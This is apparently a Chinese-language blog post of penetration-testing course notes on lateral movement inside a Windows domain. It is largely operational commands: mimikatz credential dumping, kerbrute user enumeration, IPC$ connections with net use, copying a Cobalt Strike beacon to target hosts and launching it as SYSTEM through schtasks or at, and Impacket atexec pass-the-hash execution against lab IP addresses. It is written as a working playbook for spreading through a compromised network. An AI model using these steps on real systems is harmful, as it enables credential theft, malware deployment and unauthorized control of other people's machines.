第178天:横向移动篇&入口差异&切换上线&IPC管道&AT&SC任务&Impacket套件&UI插件

当用户上线后不在域内该怎么办?

法一 提权到system

先尝试提权,使用CS的插件
system可以脱离域的控制,如果system能与域内通信也可以进行操作,如果不行就只能切换到域内用户进行操作
image
提权到system后可以对域内信息进行收集
image

法二 切换到域内用户

image
可以直接用CS自带的mimikatz进行获取账号密码

image
使用mimikatz抓到密码后再重新上线
image

工具使用:
https://github.com/ropnop/kerbrute
kerbrute_windows_amd64.exe userenum --dc ip -d 域名 字典文件
如果是在域外,可以上传此放在被控机上,进行尝试枚举
image

mimikatz 注意事项

当系统为windows10或者2012R以上的时候是没有办法抓取明文密码的
可以通过修改注表的方式进行抓取,但需要重启登录才能抓取 系统安全机制限制了明文密码存储和读取 主要是关闭了WDigest

域内或者与域外其实都得提权,域内需要提权获取密码

横向移动知识点:

IPC域内移动测试:
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是一个用于进程间通信的开放式命名管道,通过提供一个可信的用户名和密码,连接双方可以建立一个安全通道并通过这个通道交换加密数据,从而实现对远程计算机的访问。需要使用目标系统用户的账号密码,使用139、445端口。

(1)看是否开启 文件和打印机共享(2)看防火墙是否运行文件和打印机共享
image

image

先使用CS进行信息收集,收集到ip和账号密码后使用icp进行横向

image

IPC的命令

net use \\server\ipc$ "password" /user:计算机名\username # 工作组
net use \\server\ipc$ "password" /user:域名\username #域内
dir \\xx.xx.xx.xx\C$\                # 查看文件列表
copy \\xx.xx.xx.xx\C$\1.bat 1.bat  # 下载文件
copy 1.bat \\xx.xx.xx.xx\C$  # 复制文件
net use \\xx.xx.xx.xx\C$\1.bat /del  # 删除IPC
net view xx.xx.xx.xx                # 查看对方共享

image

通常IPC横向控制机器后,上传木马
2、把木马横向上传到目标机器后执行 使用at或者schtasks 进行执行-
(1)schtasks >=Windows2012

copy beacon.exe \\192.168.3.32\c$  #拷贝执行文件到目标机器
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn beacon /sc DAILY /tr c:\beacon.exe /F #创beacon任务对应执行文件
schtasks /run /s 192.168.3.32 /tn beacon /i #运行beacon任务
schtasks /delete /s 192.168.3.32 /tn beacon /f#删除beacon任务

(2)at < Windows2012

copy beacon.exe \\192.168.3.21\c$  #拷贝执行文件到目标机器
at \\192.168.3.21 15:47 c:\beacon.exe   #添加计划任务

工具插件/CS自带/impacket套件

image

impacket(可以通过hash值进行上线)

https://github.com/fortra/impacket
搭建socks隧道后本地运行py脚本进行上线

python atexec.py god/administrator:Admin12345@192.168.3.21 "ver"
python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"

上线方法:
(1)下载后门 通过棱角社区进行工具的下载
(2)通过powershell运行
image

建立IPC常见的错误代码

(1)5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限
(2)51:网络问题,Windows 无法找到网络路径
(3)53:找不到网络路径,可能是IP地址错误、目标未开机、目标Lanmanserver服务未启动、有防火墙等问题
(4)67:找不到网络名,本地Lanmanworkstation服务未启动,目标删除ipc
(5)1219:提供的凭据和已存在的凭据集冲突,说明已建立IPC$,需要先删除
(6)1326:账号密码错误
(7)1792:目标NetLogon服务未启动,连接域控常常会出现此情况
(8)2242:用户密码过期,目标有账号策略,强制定期更改密码

IPC一些命令的解释

域内用户权限测试:webadmin权限
net use \\192.168.3.32\ipc$ "admin!@#45" /user:sqlserver\administrator
如果要登录本机的adminstrator则前面必须要加上计算机名称(这边是sqlserver)
net use \\192.168.3.32\ipc$ "admin!@#45" /user:god\dbadmin

net use \\192.168.3.32\ipc$ "admin!@#45" /user:administrator
上面的命令会理解为登录域里的administrator而不是登录目标的administrator用户

域外用户权限测试:administrator权限
net use \\192.168.3.32\ipc$ "admin!@#45" /user:administrator 
//登录本机administrator用户
net use \\192.168.3.32\ipc$ "admin!@#45" /user:sqlserver\administrator  
//登录sqlserver机器的administrator用户
net use \\192.168.3.32\ipc$ "admin!@#45" /user:god\dbadmin
//登录god域的administrator用户

防火墙开启入站阻止入站测试
防火墙开启入站放行入站测试

posted @ 2025-10-31 17:55  JuneCy  阅读(21)  评论(0)    收藏  举报